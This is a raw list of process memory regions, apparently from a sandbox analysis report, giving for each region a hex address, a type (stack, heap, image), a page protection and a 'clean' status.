7EFB2000
unkown image
page readonly
 clean
3009000
unkown
page read and write
 clean
343A000
unkown
page read and write
 clean
59DE000
stack
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
2F64000
unkown
page read and write
 clean
782000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
358B000
unkown
page read and write
 clean
3669000
unkown
page read and write
 clean
30E8000
unkown
page read and write
 clean
20E0000
heap private
page read and write
 clean
60000
unkown image
page readonly
 clean
7380000
stack
page read and write
 clean
316000
unkown
page read and write
 clean
1B910000
unkown
page read and write
 clean
1DF0000
heap private
page read and write
 clean
3E5000
unkown
page read and write
 clean
256000
unkown
page read and write
 clean
7FFFFF10000
unkown
page execute and read and write
 clean
240000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
1AD000
unkown
page execute and read and write
 clean
564E000
stack
page read and write
 clean
7FF00160000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
2444000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
780000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
7AA000
heap default
page read and write
 clean
1B87C000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
1ACB0000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
3240000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
40000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
1BA60000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
5D4C000
stack
page read and write
 clean
50000
unkown image
page readonly
 clean
C0000
heap default
page read and write
 clean
582E000
unkown
page read and write
 clean
A1F000
stack
page read and write
 clean
20000
unkown
page read and write
 clean
7FF000E0000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
3B06000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
BC0000
unkown
page read and write
 clean
3459000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
4AFC000
stack
page read and write
 clean
1B8AA000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
450000
unkown
page read and write
 clean
3AA2000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
7FFFFFB0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
A8000
heap default
page read and write
 clean
7FF00160000
unkown
page execute and read and write
 clean
1B8AE000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
6C7000
heap default
page read and write
 clean
1B450000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
2966000
unkown
page read and write
 clean
12C7C000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
1B56000
unkown
page read and write
 clean
63AE000
stack
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
30E6000
unkown
page read and write
 clean
2FAB000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
2B8000
heap default
page read and write
 clean
CCE000
unkown image
page readonly
 clean
7FFFFF00000
unkown
page execute and read and write
 clean
8D2C000
stack
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
3A56000
unkown
page read and write
 clean
3A7C000
unkown
page read and write
 clean
7A0000
unkown
page read and write
 clean
3159000
unkown
page read and write
 clean
210000
unkown
page read and write
 clean
41F0000
stack
page read and write
 clean
61AE000
stack
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
80000
unkown image
page read and write
 clean
190000
unkown image
page readonly
 clean
46A0000
unkown image
page readonly
 clean
62C000
stack
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
6890000
unkown
page read and write
 clean
7FF001F7000
unkown
page read and write
 clean
3C6000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
B17000
heap private
page read and write
 clean
372C000
unkown
page read and write
 clean
57FF000
unkown
page read and write
 clean
1C70000
unkown image
page readonly
 clean
400000
unkown
page execute and read and write
 clean
7EFB2000
unkown image
page readonly
 clean
223C000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
3698000
unkown
page read and write
 clean
292E000
stack
page read and write
 clean
7FFFFF00000
unkown
page execute and read and write
 clean
760000
unkown
page read and write
 clean
430000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
6E4000
heap default
page read and write
 clean
384000
heap private
page read and write
 clean
760000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
1F15000
heap private
page read and write
 clean
7FF001A0000
unkown
page execute and read and write
 clean
3F0000
unkown
page read and write
 clean
41F0000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
353C000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
6B0000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
688F000
stack
page read and write
 clean
167000
unkown
page execute and read and write
 clean
7FF0001A000
unkown
page execute and read and write
 clean
7EFD0000
unkown image
page readonly
 clean
27A0000
unkown
page read and write
 clean
7FF0003C000
unkown
page execute and read and write
 clean
2EBA000
unkown
page read and write
 clean
1C77E000
stack
page read and write
 clean
450000
unkown
page read and write
 clean
2D0000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
490000
heap private
page execute and read and write
 clean
5D20000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
C52000
unkown image
page execute read
 clean
7FFFFFB2000
unkown image
page readonly
 clean
7FF00150000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
5D20000
unkown
page read and write
 clean
2325000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
7EFB2000
unkown image
page readonly
 clean
3A3A000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
50000
unkown image
page readonly
 clean
7392000
stack
page read and write
 clean
455000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7D0000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
698B000
unkown
page read and write
 clean
7FF001B0000
unkown
page read and write
 clean
7FF001F0000
unkown
page read and write
 clean
2F7D000
unkown
page read and write
 clean
1F9F000
stack
page read and write
 clean
C4E000
stack
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
12C55000
unkown
page read and write
 clean
3AEC000
unkown
page read and write
 clean
2C8F000
unkown
page read and write
 clean
4FAE000
stack
page read and write
 clean
6515000
unkown
page read and write
 clean
507000
heap default
page read and write
 clean
B30000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
C52000
unkown image
page execute read
 clean
1B4CF000
unkown
page read and write
 clean
34B5000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
3A18000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
160000
unkown
page read and write
 clean
7EF30000
unkown
page execute and read and write
 clean
22B000
unkown
page execute and read and write
 clean
4430000
unkown
page read and write
 clean
4615000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
6610000
heap private
page read and write
 clean
2FCE000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
A20000
unkown
page read and write
 clean
255000
unkown
page read and write | page guard
 clean
C52000
unkown image
page execute read
 clean
760000
unkown
page read and write
 clean
3054000
unkown
page read and write
 clean
7FF00170000
unkown
page execute and read and write
 clean
354C000
unkown
page read and write
 clean
78C6000
unkown
page read and write
 clean
50E000
heap default
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
7FFFFFB2000
unkown image
page readonly
 clean
DE000
heap default
page read and write
 clean
480000
unkown
page read and write
 clean
1BD000
unkown
page execute and read and write
 clean
2F72000
unkown
page read and write
 clean
23AD000
stack
page read and write
 clean
610000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
3B31000
unkown
page read and write
 clean
780000
unkown
page read and write
 clean
3259000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
2E91000
unkown
page read and write
 clean
140000
unkown
page read and write
 clean
118000
heap private
page read and write
 clean
501000
heap default
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
C52000
unkown image
page execute read
 clean
760000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7A0000
unkown
page read and write
 clean
321D000
unkown
page read and write
 clean
31B9000
unkown
page read and write
 clean
323A000
unkown
page read and write
 clean
767000
unkown
page read and write
 clean
2DAF000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
764000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
649E000
stack
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
CE0000
unkown image
page readonly
 clean
7EFB2000
unkown image
page readonly
 clean
7FF001A0000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
2322000
unkown
page read and write
 clean
1C83E000
stack
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
20000
unkown image
page readonly
 clean
1BB90000
heap private
page read and write
 clean
27A0000
unkown
page read and write
 clean
EF000
heap default
page read and write
 clean
4B70000
heap private
page read and write
 clean
CCE000
unkown image
page readonly
 clean
3536000
unkown
page read and write
 clean
7FF001D0000
unkown
page execute and read and write
 clean
A0000
heap default
page read and write
 clean
550000
unkown image
page readonly
 clean
12FD0000
unkown
page read and write
 clean
2A20000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
5C0000
unkown image
page readonly
 clean
AE0000
unkown image
page readonly
 clean
2C4A000
unkown
page read and write
 clean
39C5000
unkown
page read and write
 clean
3D0000
unkown image
page readonly
 clean
366C000
unkown
page read and write
 clean
100000
heap default
page read and write
 clean
3E5000
unkown
page read and write
 clean
2960000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
7812000
unkown
page read and write
 clean
380000
heap private
page read and write
 clean
760000
unkown
page read and write
 clean
2FC8000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
2215000
heap private
page read and write
 clean
57A0000
unkown
page read and write
 clean
1BAEE000
stack
page read and write
 clean
400000
unkown
page execute and read and write
 clean
7EFB0000
unkown image
page readonly
 clean
30AD000
unkown
page read and write
 clean
1F00000
unkown image
page readonly
 clean
7FF00022000
unkown
page execute and read and write
 clean
1B86B000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
225000
unkown
page execute and read and write
 clean
45E0000
unkown
page read and write
 clean
3B38000
unkown
page read and write
 clean
5D50000
unkown image
page readonly
 clean
5E6E000
stack
page read and write
 clean
3E5000
unkown
page read and write
 clean
58F000
heap default
page read and write
 clean
21EE000
stack
page read and write | page guard
 clean
3A08000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
9230000
unkown
page read and write
 clean
3552000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
BD6000
unkown
page read and write
 clean
5FDF000
stack
page read and write
 clean
4C7000
heap default
page read and write
 clean
574000
heap private
page read and write
 clean
760000
unkown image
page readonly
 clean
C50000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
7EFB2000
unkown image
page readonly
 clean
2A10000
unkown
page read and write
 clean
77D0000
unkown
page read and write
 clean
39B0000
unkown
page read and write
 clean
459000
unkown
page read and write
 clean
47F0000
stack
page read and write
 clean
1B14000
heap private
page read and write
 clean
3829000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
710000
unkown image
page readonly
 clean
7FFFFFC0000
unkown image
page readonly
 clean
7FF001E0000
unkown
page read and write
 clean
39D6000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
750000
heap private
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
5E0000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
45D0000
unkown
page read and write
 clean
7FF00260000
unkown
page execute and read and write
 clean
7A0000
unkown
page read and write
 clean
57D000
heap default
page read and write
 clean
370000
unkown
page execute and read and write
 clean
313C000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
222000
unkown
page read and write
 clean
2B0000
unkown
page read and write
 clean
3ADC000
unkown
page read and write
 clean
3A96000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
23DF000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
6521000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
30B7000
unkown
page read and write
 clean
2E7F000
unkown
page read and write
 clean
1EF0000
unkown image
page readonly
 clean
30ED000
unkown
page read and write
 clean
2C40000
unkown
page read and write
 clean
2219000
heap private
page read and write
 clean
3666000
unkown
page read and write
 clean
3117000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
4660000
heap private
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
23E000
stack
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
34BF000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
7FFFFFC2000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
20BD000
stack
page read and write
 clean
3E5000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
1B20000
unkown
page read and write
 clean
30EC000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
4F0000
unkown image
page readonly
 clean
36CB000
unkown
page read and write
 clean
790000
unkown
page read and write
 clean
3287000
unkown
page read and write
 clean
1F4B000
heap private
page read and write
 clean
400000
unkown
page execute and read and write
 clean
7EFE0000
unkown image
page readonly
 clean
357000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
2D00000
heap private
page execute and read and write
 clean
2020000
unkown image
page readonly
 clean
A20000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
2820000
unkown
page read and write
 clean
4610000
unkown
page read and write
 clean
6AE000
stack
page read and write
 clean
2F76000
unkown
page read and write
 clean
7FF000FA000
unkown
page execute and read and write
 clean
152000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
6986000
unkown
page read and write
 clean
2F9F000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
1CAC0000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
9C30000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
60000
unkown image
page readonly
 clean
2820000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
1CA0000
unkown image
page readonly
 clean
7FF00020000
unkown
page read and write
 clean
1CABD000
stack
page read and write
 clean
1A0000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
2ED7000
unkown
page read and write
 clean
2FDE000
unkown
page read and write
 clean
7A4000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7FFFFFC2000
unkown image
page readonly
 clean
7FFFFFC0000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
486E000
stack
page read and write
 clean
CCE000
unkown image
page readonly
 clean
424000
heap private
page read and write
 clean
306A000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
367C000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
2EA1000
unkown
page read and write
 clean
3568000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
400000
unkown
page execute and read and write
 clean
560000
unkown image
page readonly
 clean
640000
unkown image
page readonly
 clean
35F1000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
30CF000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
4790000
unkown
page read and write
 clean
35F9000
unkown
page read and write
 clean
64F5000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
920000
heap private
page execute and read and write
 clean
3E0000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
2930000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
76B000
unkown
page read and write
 clean
2A0F000
stack
page read and write
 clean
7EFE0000
unkown image
page readonly
 clean
4230000
unkown
page read and write
 clean
3A80000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
156000
unkown
page execute and read and write
 clean
C49000
unkown
page read and write
 clean
20000
unkown image
page read and write
 clean
3E0000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
422A000
stack
page read and write
 clean
A20000
unkown
page read and write
 clean
39FE000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
730000
heap default
page read and write
 clean
60000
unkown image
page readonly
 clean
400000
unkown
page execute and read and write
 clean
34FE000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
2F3E000
unkown
page read and write
 clean
129000
heap default
page read and write
 clean
134000
unkown
page read and write
 clean
12D61000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
764000
unkown
page read and write
 clean
1ADE0000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
2F8B000
unkown
page read and write
 clean
C0E000
stack
page read and write
 clean
2FB6000
unkown
page read and write
 clean
3A75000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
20E0000
unkown
page read and write
 clean
BC0000
unkown
page execute and read and write
 clean
5E0000
unkown
page read and write
 clean
81D0000
unkown
page read and write
 clean
1FD0000
heap private
page read and write
 clean
3E5000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
12D85000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
4780000
unkown image
page read and write
 clean
357E000
unkown
page read and write
 clean
474F000
stack
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
2A1A000
unkown
page read and write
 clean
16A000
unkown
page read and write
 clean
2222000
heap private
page read and write
 clean
2820000
unkown
page read and write
 clean
64DE000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
354F000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
569E000
stack
page read and write
 clean
60000
unkown image
page readonly
 clean
3385000
unkown
page read and write
 clean
21EF000
stack
page read and write
 clean
6A20000
stack
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
765000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
2F87000
unkown
page read and write
 clean
2D40000
heap private
page execute and read and write
 clean
48E0000
heap private
page read and write
 clean
2FBB000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
7FFFFFB2000
unkown image
page readonly
 clean
452000
unkown
page read and write
 clean
3A14000
unkown
page read and write
 clean
68DE000
stack
page read and write
 clean
27A0000
unkown
page read and write
 clean
307E000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
7EFC2000
unkown image
page readonly
 clean
68D2000
unkown
page read and write
 clean
4610000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
7FF00220000
unkown
page execute and read and write
 clean
760000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
3D0000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
39CF000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
60000
unkown image
page readonly
 clean
360000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7A0000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
4420000
unkown
page read and write
 clean
2F3A000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
2D0000
unkown
page execute and read and write
 clean
3139000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
7FFFFFC2000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
BE0000
unkown
page read and write
 clean
2C4F000
stack
page read and write
 clean
3AF9000
unkown
page read and write
 clean
2E0000
unkown
page read and write
 clean
2A30000
unkown image
page readonly
 clean
2F4A000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
452000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
2EBD000
unkown
page read and write
 clean
5E0000
unkown
page read and write
 clean
2421000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
53FE000
stack
page read and write | page guard
 clean
BB0000
unkown
page read and write
 clean
28C0000
heap private
page execute and read and write
 clean
3E0000
unkown
page read and write
 clean
304C000
unkown
page read and write
 clean
4E0000
unkown
page read and write
 clean
2AD000
heap default
page read and write
 clean
3110000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
20E0000
unkown
page read and write
 clean
2ABF000
stack
page read and write
 clean
1B4F7000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
1D30000
unkown image
page readonly
 clean
3725000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
785000
unkown
page read and write
 clean
4480000
unkown
page execute and read and write
 clean
BB0000
unkown
page read and write
 clean
2310000
unkown
page read and write
 clean
21C000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
4B0000
unkown image
page read and write
 clean
277000
heap default
page read and write
 clean
13D000
unkown
page execute and read and write
 clean
1F10000
heap private
page read and write
 clean
27A0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
288A000
heap private
page execute and read and write
 clean
2F24000
unkown
page read and write
 clean
7B0000
heap private
page execute and read and write
 clean
2FE4000
unkown
page read and write
 clean
1B10000
heap private
page read and write
 clean
2870000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
7FF001E7000
unkown
page read and write
 clean
764000
unkown
page read and write
 clean
2314000
heap private
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
C52000
unkown image
page execute read
 clean
1BD0000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
23B0000
unkown image
page readonly
 clean
32E9000
unkown
page read and write
 clean
7FF00250000
unkown
page execute and read and write
 clean
763000
unkown
page read and write
 clean
61B0000
unkown
page read and write
 clean
2FCA000
unkown
page read and write
 clean
547C000
stack
page read and write
 clean
7FF0002A000
unkown
page execute and read and write
 clean
3E0000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
12DC1000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
A20000
unkown
page read and write
 clean
70000
heap private
page read and write
 clean
60000
unkown image
page readonly
 clean
450000
unkown
page read and write
 clean
36BE000
unkown
page read and write
 clean
3E8000
unkown
page read and write
 clean
2734000
unkown
page read and write
 clean
25B4000
heap private
page read and write
 clean
7FF001F0000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
69E000
stack
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
32A0000
unkown
page read and write
 clean
3D8000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
27A0000
unkown
page read and write
 clean
4780000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
223A000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
6B0000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
1FD4000
heap private
page read and write
 clean
1ED0000
unkown image
page readonly
 clean
570000
heap private
page read and write
 clean
300C000
unkown
page read and write
 clean
309D000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
1CAC0000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
50B000
heap default
page read and write
 clean
760000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
320000
heap private
page read and write
 clean
450000
unkown
page read and write
 clean
2FE7000
unkown
page read and write
 clean
77D0000
unkown
page read and write
 clean
2EB0000
unkown
page read and write
 clean
20000
unkown
page read and write
 clean
3339000
unkown
page read and write
 clean
447C000
stack
page read and write
 clean
3012000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
1E7000
heap default
page read and write
 clean
30C8000
unkown
page read and write
 clean
1A0000
heap default
page read and write
 clean
2B2F000
stack
page read and write
 clean
455000
unkown
page read and write
 clean
3575000
unkown
page read and write
 clean
3B0A000
unkown
page read and write
 clean
7FF00022000
unkown
page execute and read and write
 clean
3120000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
1BAC0000
heap private
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
1FD7000
heap private
page read and write
 clean
241F000
stack
page read and write
 clean
2300000
unkown
page read and write
 clean
312D000
unkown
page read and write
 clean
4A0000
heap private
page read and write
 clean
3E0000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
30000
unkown image
page readonly
 clean
7EFB2000
unkown image
page readonly
 clean
6620000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
32B3000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
455000
unkown
page read and write
 clean
5E0000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
4A7F000
unkown
page read and write
 clean
7FFFFFD0000
unkown image
page readonly
 clean
7FF000E2000
unkown
page execute and read and write
 clean
311D000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
2430000
unkown image
page readonly
 clean
1BBCE000
stack
page read and write
 clean
3E5000
unkown
page read and write
 clean
7FF00270000
unkown
page read and write
 clean
70A000
heap default
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
4230000
unkown
page read and write
 clean
2BB000
unkown
page read and write
 clean
80000
unkown image
page read and write
 clean
C50000
unkown image
page readonly
 clean
3379000
unkown
page read and write
 clean
2F31000
unkown
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
5824000
unkown
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
110000
heap private
page read and write
 clean
3AAC000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
1E90000
heap private
page execute and read and write
 clean
1B871000
unkown
page read and write
 clean
1B810000
unkown
page read and write
 clean
1EA000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7FF00112000
unkown
page execute and read and write
 clean
524000
heap default
page read and write
 clean
780000
unkown
page read and write
 clean
30000
unkown image
page readonly
 clean
64A0000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
40000
unkown image
page readonly
 clean
1CAC0000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
7EFE0000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
5FDE000
stack
page read and write | page guard
 clean
3E0000
unkown
page read and write
 clean
5E0000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
620000
unkown image
page readonly
 clean
50000
unkown image
page readonly
 clean
A2FE000
stack
page read and write
 clean
A20000
unkown
page read and write
 clean
500000
unkown image
page read and write
 clean
17A000
heap default
page read and write
 clean
3C8000
heap private
page read and write
 clean
1C0000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
260000
heap private
page read and write
 clean
760000
unkown
page read and write
 clean
1FC0000
unkown
page read and write
 clean
BAE000
stack
page read and write
 clean
4610000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
2CDE000
stack
page read and write | page guard
 clean
32BD000
unkown
page read and write
 clean
3129000
unkown
page read and write
 clean
BB0000
unkown
page read and write
 clean
12DAC000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
3183000
unkown
page read and write
 clean
3588000
unkown
page read and write
 clean
16B000
unkown
page execute and read and write
 clean
2F94000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
318D000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
5520000
heap private
page read and write
 clean
48B000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
66E000
stack
page read and write
 clean
380000
heap private
page execute and read and write
 clean
70D000
heap default
page read and write
 clean
C8000
heap default
page read and write
 clean
450000
unkown
page read and write
 clean
